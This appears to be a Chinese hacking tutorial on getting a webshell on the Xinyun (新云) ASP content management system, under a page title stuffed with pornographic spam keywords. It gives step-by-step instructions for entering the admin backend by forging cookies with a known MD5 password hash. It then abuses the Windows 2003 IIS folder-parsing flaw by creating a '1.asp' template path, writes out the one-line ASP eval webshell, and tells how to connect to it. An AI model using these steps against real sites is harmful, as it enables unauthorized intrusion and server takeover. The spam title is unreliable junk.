压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

新云網(wǎng)站管理系統(tǒng)后臺拿WEBSHELL

  新云網(wǎng)站管理系統(tǒng)是現(xiàn)在比較流行的cms系統(tǒng),功能也算強大,但由于ASP語言本身的安全環(huán)境不是很好,所以漏洞多多也不新鮮,我這里一共發(fā)現(xiàn)了兩個安全隱患,應(yīng)該說是致命的。

  一、COOKIES欺騙,進入后臺。

  大家都知道,一般的后臺密碼都是MD5加密的,如果管理員把密碼設(shè)置的復(fù)雜一點,即使你在聰明,恐怕也要用個一年半載才能破解出來,但其實,新云的后臺只要知道MD5的值就可以進入,這也是一般的ASP程序經(jīng)常有的情況。

  方法就是在本地搭設(shè)一個相同版本的新云站點,然后用COOKIES修改瀏覽器,先進入本地的新云管理后臺,然后修改COOKIES ,將賬號、密碼、網(wǎng)址都改成待入侵網(wǎng)站的就可以了,一回車,你就會發(fā)現(xiàn)我們已經(jīng)成功的進入了待入侵網(wǎng)站的后臺。

  這個方法比較簡單,也常見,我就不多說了,我的是下面的后臺如何取得WEBSHELL.

  二、后臺拿WEBSHELL(系統(tǒng)2003)

  我們點擊模板管理,新建一個模板,名稱隨便,但注意模板路徑一定要是"1.asp"這類,因為2003會把1.asp解析成為文件夾,新建完成之后我們會看到網(wǎng)站根目錄下面會生成一個1.asp的文件夾,這時我們點擊編輯CSS樣式,我們將整個代碼都用<%eval request("haosec")%>替換掉,然后點擊保存。

  這時你會發(fā)現(xiàn),在1.asp文件夾下面會新建一個文件style.css,里面的內(nèi)容就是一句話了。我們將http://my/1.asp/style.css用LACKER2一句話進行連接,可以看到已經(jīng)連接成功。

  這樣我們就得到了一個WEBSHELL。

  其實漏洞形成的原因無非就是過濾不嚴(yán)密造成的,使用新云的朋友一定要保護好數(shù)據(jù)庫和后臺,否則你就慘嘍。

 

上一篇:安卓防火墻 PS DroidWall

下一篇:Wireshark基本介紹和學(xué)習(xí)TCP三次握手